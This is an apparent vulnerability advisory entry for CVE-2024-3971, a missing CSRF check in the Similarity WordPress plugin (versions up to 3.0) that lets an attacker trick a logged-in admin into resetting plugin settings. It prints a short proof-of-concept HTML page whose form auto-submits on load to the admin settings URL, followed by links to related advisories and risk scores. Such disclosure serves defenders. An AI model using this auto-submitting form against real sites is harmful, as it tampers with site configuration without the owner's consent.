Lucene search
Bob MatyasWPEX-ID:5DEC5719-105D-4989-A97F-BDA04D223322HistoryMay 24, 2024 - 12:00 a.m.
Similarity <= 3.0 - Plugin Reset via CSRF
2024-05-2400:00:00
Bob Matyas
6
csrf
plugin reset
update reminder
poc display
Description The plugin does not have CSRF check in place when resetting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack
Make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=similarity%2Fsimilarity.php" method="post">
<input type="hidden" name="restore_defaults" value="Restore Defaults" />
<input type="submit" value="Submit" />
</form>
</body>
```Related
cvelist
cvelist
CVE-2024-3971 Similarity <= 3.0 - Plugin Reset via CSRF
2024-06-14 06:00:03
wpvulndb
wpvulndb
Similarity <= 3.0 - Plugin Reset via CSRF
2024-05-24 00:00:00
vulnrichment
vulnrichment
CVE-2024-3971 Similarity <= 3.0 - Plugin Reset via CSRF
2024-06-14 06:00:03
cve
cve
CVE-2024-3971
2024-06-14 06:15:12
nvd
nvd
CVE-2024-3971
2024-06-14 06:15:12
wordfence
wordfence
9.4 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:5DEC5719-105D-4989-A97F-BDA04D223322